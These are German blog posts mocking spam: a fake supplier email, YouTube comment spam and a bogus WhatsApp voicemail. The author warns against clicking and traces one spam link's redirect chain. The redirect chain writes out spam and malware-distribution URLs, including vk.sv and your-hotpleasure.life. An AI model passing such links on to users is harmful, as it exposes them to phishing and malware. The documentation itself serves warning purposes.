Die Schadsoftware wird zurzeit nur von einem guten Viertel der gängigen Antivirus-Schlangenöle als Schadsoftware erkannt. Wer sich auf diesen Schutz verlassen hat, ist einmal mehr verlassen. ☹️

Wer hingegen niemals in eine E-Mail klickt, wenn die Zustellung eines Anhangens nicht vorher über einen anderen Kanal als E-Mail (zum Beispiel telefonisch) vereinbart wurde, ist auf der sicheren Seite. Das gleiche gilt für die viel zu wenigen Menschen, die digitale Signaturen sinnvoll benutzen und nur Anhänge in E-Mails von wirklich vertrauenswürdigen Absendern öffnen. Gehirn hilft. Vernünftige und einsichtige Techniknutzung hilft. Schlangenöl hilft nicht. 🧠️

Look forward to working with you.

Ich würde auch gern mal mit dir „arbeiten“, Spammer! 🥊️

Thank you,

Nur echt mit einem obligatorischen, pseudohöflichen und letztlich patzigen „Dank für Nichts“. 🤢️

Ines Friedl

Leiter Einkauf/ Head of purchasing
Handlungsbevollmächtigter
Gebrüder Dorfner GmbH & Co.
Kaolin- und Kristallquarzsand-Werke KG
Scharhof 1
D-92242 Hirschau
Germany

Hier spammt der Einkaufsleiter noch selbst. 😁️

Natürlich hat das eventuell bestehende Unternehmen mit der benannten Firmierung nichts mit dieser Spam zu tun. Alles in dieser Spam ist Lüge. 🤥️

Entf! 🗑️

Schadsoftware-Spam auf YouTube

Sonntag, 13. Februar 2022

Natürlich ist alles, was auch nur Ähnlichkeit zu „Social Media“ hat, eine Einladung an asoziale und kriminelle Spammer. Der folgende Kommentar ist mir eben zu einem deutschsprachigen Video auf YouTube aufgefallen, weil er eben sprachlich ein bisschen danebengegriffen hat. Und dabei wurden gleich mehrere Sprachen ausprobiert:

Asi con toy y sus🔞 mañas no se la VK.SV/KANGKUNG Megan: „Hotter“ Hopi: „Sweeter“ Joonie: „Cooler“ Yoongi: „Butter“ Asi con toy y sus mañas no se la lease que escriba bien mamon hay nomas pa ra reirse un rato y no estar triste y estresado.por la vida dura que se vive hoy . Köz karaş: ‚‘Taŋ kaldım'‘ Erinder: ‚‘Sezimdüü'‘ Jılmayuu: ‚‘Tattuuraak'‘ Dene: ‚‘Muzdak'‘ Jizn, kak krasivaya melodiya, tolko pesni pereputalis. Aç köz arstan Bul ukmuştuuday ısık kün bolçu, jana arstan abdan açka bolgon. Uyunan çıgıp, tigi jer-jerdi izdedi. Al kiçinekey koyondu gana taba algan. Al bir az oylonboy koyondu karmadı. ‚‘Bul koyon menin kursagımdı toyguza albayt'‘ dep oylodu arstan. Arstan koyondu öltüröyün dep jatkanda, bir kiyik tigi tarapka çurkadı. Arstan aç köz bolup kaldı. Kiçine koyondu emes, çoŋ kiyikti jegen jakşı dep oylodu.#垃圾

Was immer ich mir jetzt unter Spielzeug und nicht-jugendfreien Tricks vorstellen soll, weiß ich nicht, aber vermutlich handelt es sich um die Art von Inhalten, die auf YouTube keinen Platz haben. Unter der (ohne Protokoll) angegebenen URL in der Domain vk (punkt) sv gibt es eine Weiterleitung…

$ location-cascade http://VK.SV/KANGKUNG
     1	https://vk.sv/KANGKUNG
     2	https://FURDICH.FUN
     3	https://your-hotpleasure.life/?u=ve9p60p&o=dz0kg03&t=BEBAS
$ surbl your-hotpleasure.life
your-hotpleasure.life	LISTED: ABUSE
$ _

…in eine Domain, die bereits wegen massenhafter Spam bekannt ist. Und wenn man sich dann einmal den „Spaß“ macht, diese URL bei VirusTotal zu überprüfen, zeigt sich schnell, dass es nicht einfach „nur“ ein bisschen spambeworbener Betrug ist, sondern…

Screenshot VirusTotal

Phishing und aktuelle Schadsoftware. Wieso aktuelle Schadsoftware? Weil die meisten Antivirus-Schlangenöle noch nicht dazu imstande sind, diese Schadsoftware als solche zu erkennen. 😠️

Was es für eine Schadsoftware ist? Ich weiß es nicht, aber die größte Mode sind zurzeit Erpressungstrojaner. Eine Art Baukasten für diese Trojaner ist im so genannten „Darknet“ verfügbar¹, wer ihn nutzt und die Schadsoftware verbreitet, ist sozusagen ein „Affiliate“ einer organisiert kriminellen Bande und kriegt dafür Prozente vom Erlös, den er erzeugt hat. Das ist sehr niedrigschwellig, weil auch verkommene Charaktere ohne tiefergehende Technikkenntnisse mitmachen können, wenn sie es nur schaffen, ihren Trojaner irgendwie zu verbreiten. Leider benötigt man fast kein Gehirn, um zu spammen – und wenn man sogar damit intellektuell überfordert ist, gibt es für ein paar Bitcoingroschen auch einfach zu nutzende Spamdienste über Botnetze im „Darknet“. Kaufen kann leider noch der größte Vollidiot. 🛒️

Und weder Empathie noch Intelligenz sind im Angebot.

Wer diese Website mit einem angreifbaren Betriebssystem oder Webbrowser aufruft, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen, während die Website so tut, als würde man sich für eine Dating-Site „Besser als Tinder“ registrieren. (Vermutlich ist man mit aktuellem Softwarestand (oder einem anderen Betriebssystem als Microsoft Windows oder Android) auf der sicheren Seite. Wer sich hingegen auf das Antivirus-Schlangenöl verlässt, weil das so schön Reklame mit müheloser Sicherheit macht, hat in den meisten Fällen verloren. In den meisten Fällen heißt hier: Zurzeit bei 91 % der Produkte. Und so ein Versagen bei einer bislang bei den Schlangenöl-Herstellern nicht bekannten Schadsoftware ist keineswegs eine Ausnahme, sondern leider der Regelfall. 😦️

Deshalb klickt man ja auch nicht in eine Spam. 🖱️🚫️

Irgendwelche „komischen Links“ auf so genannten „Social-Media-Sites“ – von mir meist liebevoll als S/M abgek. – sollte man niemals klicken oder gar wie in diesem Fall über das Kontextmenü des Textes aufrufen. Es ist ganz sicher nicht die einzige Version dieser Spam auf YouTube, die mir eben übern Weg gelaufen ist. Wenn Spammer einen Trick gefunden haben, mit dem sie einigermaßen sicher an der dortigen Spamfilterung vorbeikommen, handelt es sich um eine riesengroße Litfasssäule, auf der sie ihren gefährlichen Sondermüll bewerben können. Und das lassen sie sich nicht entgehen. Sie leben davon. 😐️

¹Ich hätte gern einen Link für Tor-Nutzer gesetzt, aber ich bin mir sicher, dass ich mich damit strafbar machen würde. Außerdem wünsche ich diesem Pack nicht neue Komplizen und noch mehr Reibach, sondern die Pest, die Syphillis und den schmerzhaft-brandigen Zerfall ihrer Hoden.

Incoming voice message, 6:48AM

Freitag, 31. Dezember 2021

Nein, diese Spam kommt nicht von WhatsApp. 🤥️

WhatsApp

Nein, diese Spam kommt nicht… oh, ich wiederhole mich. Ich habe übrigens kein Konto bei WhatsApp und würde WhatsApp nicht einmal nutzen, wenn ich eines dieser Gängelungs-, Überwachungs- und Technikverhinderungstelefone hätte. Und zwar, weil ich grundsätzlich keine Angebote von Spammern nehme. Und Facebook ist mir eine Zeitlang sehr unangenehm durch illegale und asoziale Spam aufgefallen, die dann auch vom Bundesgerichtshof als illegale und asoziale Spam beurteilt wurde. Es sind alles erwachsene Menschen. Ich werde niemanden davon abhalten, ein Produkt einer Unternehmung zu verwenden, das sich seine Marketingideen auch schon einmal direkt bei der Organisierten Internetkriminalität abgeschaut hat¹. Ich tue das nicht. Weil ich es für dumm hielte, das zu tun. Und ich halte auch Menschen für dumm, wenn sie das tun. Aber zur Freiheit eines Menschen gehört auch die Freiheit, Dummes tun zu können. In diesem Sinne: Immer nur zu! 👍️

Incoming voicemessage.

Information

Dec 31 6:48 AM
09 seconds

Weder die Sprache, noch das Datumsformat, noch die Anzeige der Uhrzeit würde zu meinen Spracheinstellungen passen, wenn ich WanzÄpp nutzte. 💩️

Listen

Der Link geht natürlich auch nicht zu WanzÄpp, sondern in die Domain einer von Kriminellen gecrackten und gepwnten französischsprachigen Website, wo es dann eine Weiterleitung auf eine als Dating-Website getarnte üble Schadsoftwareschleuder gibt. Wer darauf klickt, jeder Website das Ausführen von Javascript im Browser gestattet und Software mit ausbeutbaren Sicherheitslücken hat, hat verloren und hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Wahrscheinlich wird es sich um Erpressungstrojaner handeln. Wenn man dann auch kein Backup hat, das man problemlos zurückspielen kann, hat man schnell einen erheblichen Schaden. ☹️

Der Betreiber der Website ist informiert und ich hoffe, er kann besser Englisch als ich Französisch kann. Aber an einem Tag wie heute kann so ein krimineller Missbrauch schon einmal eine Zeitlang im offenen Web stehenbleiben. Leider. Die Spam, die bei mir angekommen ist, wird wohl auch nicht die einzige zum heutigen Jahresende sein. Viele Menschen erwarten gute Wünsche von anderen Menschen, weil sie einen neuen Kalender brauchen. Da wird dann halt auch in eine angebliche „voicemessage“ geklickt. 🍄️

© WhatsApp

Wie schon gesagt: Diese Spam kommt nicht von WhatsApp. Das ändert sich auch nicht dadurch, dass da ein Hirnkrepel unter dem Kürzsttext ein „geistiges Eigentum“ von WanzÄpp proklamiert. 🤪️

Für diese Website Unser täglich Spam gilt übrigens ein immerwährendes Urheberrecht des allmächtigen Turnschuhs. Wer hiervon auch nur kleinste Textbestandteile (so genannte Buchstaben) für eigene Werke übernimmt, muss in einer ewigen Hölle in der Turnschuhfabrik Akkordarbeit knechten. Natürlich nicht unter dem bundesdeutschen Mindestlohn, und auch nicht unter menschenwürdigen Arbeitsbedingungen. ⚙️

Wer keinen Humor hat: Etwas in eine gigantische Kopiermaschine – das so genannte Internet – zu stecken und dazu ein „geistiges Eigentum“ zu proklamieren, ist nur lächerlich. Ich weiß, dass das viele nicht davon abhält, sich auf diese Weise lächerlich zu machen. 🤡️

Wer diese dumme Spam nicht unter Abpumpen von Lachtränen sofort löscht, sondern sich auch noch den Quelltext mitanschaut, findet übrigens eine interessante neue Spammasche, die natürlich nicht funktioniert hat: Die Verwendung realdadaistischer Bullshit-Header in der Mail. 🤦‍♂️️

Vales-Diplomats: 79
Satisfactory-Efficiencies-Bouquet: 3
Teaspoons-Enchantress-Bedazzles: 9937
Synchronous-Realizing: melanesian
Motioning-Mutiny-Mediator: 665C924BD559A65F

Ja, das steht da wirklich so drin, nur nicht unmittelbar hintereinander. Auf die Idee, dass das eine gute Idee ist, muss man als Spammer auch erstmal kommen. Ich bin jedenfalls froh, dass ich diese geistigen Welten immer aus sicherem Abstand begutachten darf. 🤣️

Allen Lesern wünsche ich ein spamfreies Jahr 2022! 🎆️

Und bitte niemals in eine E-Mail klicken! Immer ein Lesezeichen im Webbrowser benutzen, um eine Website aufzurufen, bei der man registriert ist. Das schützt vor solchen Überrumpelungen, aber es schützt auch vor Phishing, der nach wie vor häufigsten Kriminalitätsform im gegenwärtigen Internet. 🖱️🚫️

¹Selbst in der Bundesrepublik Deutschland mit ihrem vollumfänglichen Rechtsschutz für beleidigte Leberwürste habe ich für derart klare Formulierungen übrigens noch nie einen bösen, teuren Brief gesehen. Es besteht schlicht keine ernsthafte Chance, hier eine Unterlassung durchzusetzen, weil es sich um die Fakten und mit Gerichtsurteilen belegbare Wahrheit über das frühere Marketing von Facebook handelt.